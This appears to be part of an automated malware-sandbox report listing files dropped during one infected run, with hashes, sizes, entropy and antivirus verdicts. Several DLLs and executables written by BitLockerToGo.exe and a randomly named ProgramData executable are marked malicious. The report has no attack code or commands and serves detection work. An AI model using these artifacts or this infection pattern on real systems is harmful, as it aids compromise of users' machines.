                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                                                                                                                                        MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                                                                                                                                        SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                                                                                                                                        SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                                                                                                                                        SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):5842928
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.890789729742247
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:98304:kYq0KmyfpgVBH9rqADdgnILbQaPhgPqt0nw9pdfvBNTHuzD8vxFJN+L24Kc:tUpg3drqMSILbQAWPqt04phBNTOEvhIh
                                                                                                                                                                                                                                                                                                                                                        MD5:18F4B337AD6BEB8E7EE040BCC8C049DF
                                                                                                                                                                                                                                                                                                                                                        SHA1:641350458E08F2275A451239DC74A2F7681ADF4F
                                                                                                                                                                                                                                                                                                                                                        SHA-256:9B3607E5A2407E4A2875EA68340CF1724853031A39DD7FAA47A97C83B1B1F5E3
                                                                                                                                                                                                                                                                                                                                                        SHA-512:68AD53F8F42B9DB45F080D5DC467E4A4A01B3DDC4D7F816A31C10C720D0B92A2F57F028E82614CCF7FF04D2CBEB0F9F0355D89E70380319A549CC926E8596AAA
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 54%
Process:C:\ProgramData\AAFIJKKEHJ.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):11695088
Entropy (8bit):7.8917166271540635
Encrypted:false
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 4%
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):8192
Entropy (8bit):0.3588072191296206
Encrypted:false
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.8337926391015026
Encrypted:false
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa43297ab, page size 16384, Windows version 10.0
Category:dropped
Size (bytes):1310720
Entropy (8bit):0.6585386228476557
Encrypted:false
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):16384
Entropy (8bit):0.07908682484263033
Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):685392
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):608080
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):450024
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                                                                                        MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                                                                                        SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                                                                                        SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):2046288
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                                                                                        MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                                                                                        SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                                                                                        SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                                                                                        SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):212730
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.466569808376566
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+r:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+r
                                                                                                                                                                                                                                                                                                                                                        MD5:164AF9F0CCEFADEC5474266C469611A3
                                                                                                                                                                                                                                                                                                                                                        SHA1:3B0CA6BC6252C81DF019B2FCE1940BEC06304542
                                                                                                                                                                                                                                                                                                                                                        SHA-256:B2CB26ADC88908D8BAF6E26880A3D0709EAA852405B880859D74EAE04685D27D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:6376074CE3D70D6CE1AC32C5717EAEC4EA6B692D274779D4D874EB8DA85B81F2F66D6EF9FBC879563E12FE9FA4BC7A0F4D351A859FAC0BD02CEF6ACBD1220C12
                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):80880
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                                                                                        MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                                                                                        SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                                                                                        SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                                                                                        SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44686
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.096013064619993
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBIwukhDO6vP6OWeCh5EEvhyaAcGoup1Xl3jVzXr4z:z/Ps+wsI7yOE869chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                                        MD5:03877D80A158A852C80E094603746C46
                                                                                                                                                                                                                                                                                                                                                        SHA1:28F5F118E0DE6627E961076B2F607A1594D5A60A
                                                                                                                                                                                                                                                                                                                                                        SHA-256:F611F9A35F301658EA159203F42DD35F6FECB1236592C9168EC429AAE952CE87
                                                                                                                                                                                                                                                                                                                                                        SHA-512:F971AE9A64ECBCC9BF4B074FD19FAA0C28212D2BD158D445088439F7F5295B2555C05C6B05BEFB4086F16A93113FEA501CBC313D11FFBC5EDA500970EE8F635F
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):45727
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.088098365575187
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:mMkbJrT8IeQcrQgx9rs2uBhDO6vP6OWeCh5EEvhyaAsImE0hKqX7KCAoVGoup1Xe:mMk1rT8HR9r769sIahfX7KRoVhu3VlXS
                                                                                                                                                                                                                                                                                                                                                        MD5:7DA9D502CDE03CFB4A69D51BADE5AFF9
                                                                                                                                                                                                                                                                                                                                                        SHA1:37F033538B8FA1AB3BD7FBA8AA238FB7387B6822
                                                                                                                                                                                                                                                                                                                                                        SHA-256:FCABC38B6163AD1C93EC5F215C1BE188020ABABEE7D9BC6F0CE8A9AD971F25A4
                                                                                                                                                                                                                                                                                                                                                        SHA-512:4124E580BAD7F91704F75C8E732D2FEC58B86EE7E81330FE92BBD1B21B5A25F815FDE528DEA8F9FBAB5BB8A9C20BBB31B5A8BB7EB85073BB02EA8D62421E7DDB
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):44137
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.0906927501100725
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMewuF9hDO6vP6O+Itbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEg6Vtbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                                                        MD5:ABCAB3E5B6E32C4E7C9F3D8DCB0B7BE1
                                                                                                                                                                                                                                                                                                                                                        SHA1:D9635CF0E4335C485684956EF9E53161BA7D718B
                                                                                                                                                                                                                                                                                                                                                        SHA-256:5F87ED1527C56AA5561F6EFE2035C5A667C8599F324D15F4EDE24BD774C04A04
                                                                                                                                                                                                                                                                                                                                                        SHA-512:0F5A4EFDF2E3BED6DA596A56436D62C28269036EFCF8CDE7F35A168AC07E7ED447C8D5E512328617D93C05BF5900074C804F564E9C117D8EB6789AEF244485F0
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):45804
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.08801873455293
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:mMkbJrT8IeQcrQgcors2uBhDO6vP6OWeih5EEvhyaAsImE0hKqX7KCAoVGoup1Xe:mMk1rT8H8or76xsIahfX7KRoVhu3VlXS
                                                                                                                                                                                                                                                                                                                                                        MD5:84A527FDA4E4CA73618B0C0FB5E9914F
                                                                                                                                                                                                                                                                                                                                                        SHA1:42EFADEBA6E0F60497AAAEFC2DD17C7778058F25
                                                                                                                                                                                                                                                                                                                                                        SHA-256:1E5FF3519A0309905C71F3DA677843BD5D7AD1610034609A67C87ECC79D1760C
                                                                                                                                                                                                                                                                                                                                                        SHA-512:904C882E21E026AB715CEAF3F800645DFD70B84E3F890B7F9531C5F4C7FA2E8D9FA48B235170EE9DCF003763CD9DEF5F3FF9F8C5386DA75361065B284C44C69D
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):107893
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.640139880887754
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7h:fwUQC5VwBIiElEd2K57P7h
                                                                                                                                                                                                                                                                                                                                                        MD5:7781A0DE57A3606D285D686A487FEB1B
                                                                                                                                                                                                                                                                                                                                                        SHA1:5F702CBBA11E1AF5598DBC7A253A8D382D074ECB
                                                                                                                                                                                                                                                                                                                                                        SHA-256:CF32BBA9E0B08B317F4E9A5DB38CE561C8BB13D337E41DCAB38AC85720F7EF0D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:A185790DAFC4904EA7DD258947811D58F855DBCC6C0D8165C179DF3669B7A7D7EC792EC27FBE671EB9076717C841631928D8BC601EC90F705FE3EB9C876C9C2E
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):107893
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.640139880887754
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7h:fwUQC5VwBIiElEd2K57P7h
                                                                                                                                                                                                                                                                                                                                                        MD5:7781A0DE57A3606D285D686A487FEB1B
                                                                                                                                                                                                                                                                                                                                                        SHA1:5F702CBBA11E1AF5598DBC7A253A8D382D074ECB
                                                                                                                                                                                                                                                                                                                                                        SHA-256:CF32BBA9E0B08B317F4E9A5DB38CE561C8BB13D337E41DCAB38AC85720F7EF0D
                                                                                                                                                                                                                                                                                                                                                        SHA-512:A185790DAFC4904EA7DD258947811D58F855DBCC6C0D8165C179DF3669B7A7D7EC792EC27FBE671EB9076717C841631928D8BC601EC90F705FE3EB9C876C9C2E
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                                        MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                                                                        SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                                                                        SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                                        MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                                                                                        SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                                                                                        SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                                                                                        SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):280
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.132041621771752
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
                                                                                                                                                                                                                                                                                                                                                        MD5:845CFA59D6B52BD2E8C24AC83A335C66
                                                                                                                                                                                                                                                                                                                                                        SHA1:6882BB1CE71EB14CEF73413EFC591ACF84C63C75
                                                                                                                                                                                                                                                                                                                                                        SHA-256:29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
                                                                                                                                                                                                                                                                                                                                                        SHA-512:8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                        Size (bytes):38626
                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.5549808317669775
                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:7rKOLL7pLGLpmIWPA+fkd8F1+UoAYDCx9Tuqh0VfUC9xbog/OV+EjeHrw2ifY+qr:7rKOLdcpmIWPA+fkdu1jaP0eU2ifY7sK
                                                                                                                                                                                                                                                                                                                                                        MD5:633743C66C287FA1C8AE26CAC4D3D24B
                                                                                                                                                                                                                                                                                                                                                        SHA1:5E6F07062D677B1A795A714933BA3C3B1E0999C4
